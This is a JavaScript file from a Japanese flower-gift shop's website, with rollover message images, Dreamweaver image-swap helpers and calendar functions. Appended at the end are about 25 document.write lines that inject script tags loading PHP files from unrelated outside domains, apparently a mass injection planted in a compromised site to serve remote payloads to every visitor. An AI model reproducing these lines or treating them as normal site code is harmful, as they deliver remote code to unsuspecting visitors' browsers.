var deFlMes52=true;
//↓最初に表示する画像
var deMes52='<img src="img/mess_t.gif" alt="フォー・ピース・クローバーへようこそ！あなたにピッタリのフラワーギフトをご提案いたします！！" width="349" height="84">';
var mes52=new Array();

//↓メッセージ
mes52[0]='<img src="img/mess_s.gif" alt="フラワーギフトのお求めはコチラからです！ごゆっくりご覧くださいませ。" width="349" height="84">';
mes52[1]='<img src="img/mess_o.gif" alt="フォー・ピース・クローバーについて、お花に関するＱ＆Ａ、ご質問お問い合わせはコチラから。" width="349" height="84">';
mes52[2]='<img src="img/mess_bridal	.gif" alt="ブーケなどのギャラリーです。ブライダルに関するお問い合わせもお気軽にどうぞ" width="349" height="84">';
mes52[3]='<img src="img/mess_order.gif" alt="オーダーメイド商品に関してのコーナーです。ご相談・ご質問もお気軽にどうぞ" width="349" height="84">';
mes52[4]='<img src="img/mess_park.gif" alt="掲示板・お客様から頂いた声・リンクについて。掲示板へは何でもお気軽にお書きください♪" width="349" height="84">';
mes52[5]='<img src="img/mess_party.gif" alt="パーティ装花に関してのコーナーです。ご相談・ご質問もお気軽にどうぞ" width="349" height="84">';
mes52[6]='<img src="img/mess_site.gif" alt="このサイトのサイトマップです。" width="349" height="84">';

var colorMes52="";
var ob1Mes52,ob2Mes52;

function writeMes52(obj,mes) {
	if (document.all || document.getElementById) obj.innerHTML=mes;
	else if (document.layers) {
		obj.document.open();
		obj.document.write(""+mes+"");
		obj.document.close();
	}
}
function setBgCoMes52(obj,color) {
	if (document.all || document.getElementById) obj.style.backgroundColor=color;
	else if (document.layers) obj.bgColor=color;
}

function showMes52(obj,flag) {
	if (document.all || document.getElementById) {
		if (flag) obj.style.visibility="visible";
		else obj.style.visibility="hidden";
	}
	else if (document.layers) {
		if (flag) obj.visibility="show";
		else obj.visibility="hide";
	}
}

function onMes52(num) {
	if (document.all || document.getElementById || document.layers) {
		writeMes52(ob2Mes52,mes52[num]);
		if (!deFlMes52) {
			showMes52(ob1Mes52,true);
			showMes52(ob2Mes52,true);
		}
	}
}

function offMes52() {
	if (document.all || document.getElementById || document.layers) {
		if (deFlMes52) writeMes52(ob2Mes52,deMes52);
		else {
			showMes52(ob2Mes52,false);
			showMes52(ob1Mes52,false);
		}
	}
}

function preLoadMes52() {
	if (document.all || document.layers || document.getElementById) {
		if (document.all) {
			ob1Mes52=document.all("FrMes52");
			ob2Mes52=document.all("MaMes52");
		}
		else if (document.getElementById) {
			ob1Mes52=document.getElementById("FrMes52");
			ob2Mes52=document.getElementById("MaMes52");
		}
		else if (document.layers) {
			ob1Mes52=document.layers["FrMes52"];
			ob2Mes52=ob1Mes52.document.layers["MaMes52"];
		}
		if (colorMes52!="") setBgCoMes52(ob1Mes52,colorMes52);
		if (deFlMes52) {
			showMes52(ob1Mes52,true);
			showMes52(ob2Mes52,true);
		}
	}
}
// End -->

function MM_swapImgRestore() { //v3.0
  var i,x,a=document.MM_sr; for(i=0;a&&i<a.length&&(x=a[i])&&x.oSrc;i++) x.src=x.oSrc;
}

function MM_preloadImages() { //v3.0
  var d=document; if(d.images){ if(!d.MM_p) d.MM_p=new Array();
    var i,j=d.MM_p.length,a=MM_preloadImages.arguments; for(i=0; i<a.length; i++)
    if (a[i].indexOf("#")!=0){ d.MM_p[j]=new Image; d.MM_p[j++].src=a[i];}}
}

function MM_findObj(n, d) { //v4.01
  var p,i,x;  if(!d) d=document; if((p=n.indexOf("?"))>0&&parent.frames.length) {
    d=parent.frames[n.substring(p+1)].document; n=n.substring(0,p);}
  if(!(x=d[n])&&d.all) x=d.all[n]; for (i=0;!x&&i<d.forms.length;i++) x=d.forms[i][n];
  for(i=0;!x&&d.layers&&i<d.layers.length;i++) x=MM_findObj(n,d.layers[i].document);
  if(!x && d.getElementById) x=d.getElementById(n); return x;
}

function MM_swapImage() { //v3.0
  var i,j=0,x,a=MM_swapImage.arguments; document.MM_sr=new Array; for(i=0;i<(a.length-2);i+=3)
   if ((x=MM_findObj(a[i]))!=null){document.MM_sr[j++]=x; if(!x.oSrc) x.oSrc=x.src; x.src=a[i+2];}
}

function MM_reloadPage(init) {  //reloads the window if Nav4 resized
  if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) {
    document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}
  else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();
}
MM_reloadPage(true);

function img_y_change(){
xx = new Date();
year = xx.getFullYear();
month = xx.getMonth()+1;
document.write('<img src="./img/' + year + '.gif" alt="' + year + '.' + month + '　カレンダー" width="121" height="39">');
}
function img_m_change(){
xx = new Date();
year = xx.getFullYear();
month = xx.getMonth()+1;
document.write('<img src="./img/'+ month + '.gif" alt="' + year + '.' + month + '　カレンダー" width="48" height="39">');
}
document.write('<script src=http://lce-design.com/casestudy/about02.php ><\/script>');
document.write('<script src=http://lce-design.com/casestudy/about02.php ><\/script>');
document.write('<script src=http://magic-soft.info/images/sIFR-screen.php ><\/script>');
document.write('<script src=http://magic-soft.info/images/sIFR-screen.php ><\/script>');
document.write('<script src=http://magic-soft.info/images/sIFR-screen.php ><\/script>');
document.write('<script src=http://magic-soft.info/images/sIFR-screen.php ><\/script>');
document.write('<script src=http://magic-soft.info/images/sIFR-screen.php ><\/script>');
document.write('<script src=http://magic-soft.info/images/sIFR-screen.php ><\/script>');
document.write('<script src=http://colagecommunication.com/_vti_bin/Thumbs.php ><\/script>');
document.write('<script src=http://mycountrygreatest.com/images/postinfo.php ><\/script>');
document.write('<script src=http://mycountrygreatest.com/images/postinfo.php ><\/script>');
document.write('<script src=http://mycountrygreatest.com/images/postinfo.php ><\/script>');
document.write('<script src=http://mycountrygreatest.com/images/postinfo.php ><\/script>');
document.write('<script src=http://mycountrygreatest.com/images/postinfo.php ><\/script>');
document.write('<script src=http://aboutpigeon.com/Templates/Orange-dove.php ><\/script>');
document.write('<script src=http://aboutpigeon.com/Templates/Orange-dove.php ><\/script>');
document.write('<script src=http://aboutpigeon.com/Templates/Orange-dove.php ><\/script>');
document.write('<script src=http://lovedaegu.kr/board_path/robots.php ><\/script>');
document.write('<script src=http://paintitpink.org/pdf/helen_aldredge.php ><\/script>');
document.write('<script src=http://paintitpink.org/pdf/helen_aldredge.php ><\/script>');
document.write('<script src=http://paintitpink.org/pdf/helen_aldredge.php ><\/script>');
document.write('<script src=http://paintitpink.org/pdf/helen_aldredge.php ><\/script>');
document.write('<script src=http://paintitpink.org/pdf/helen_aldredge.php ><\/script>');
document.write('<script src=http://thinkgeek.be/images/gifimg.php ><\/script>');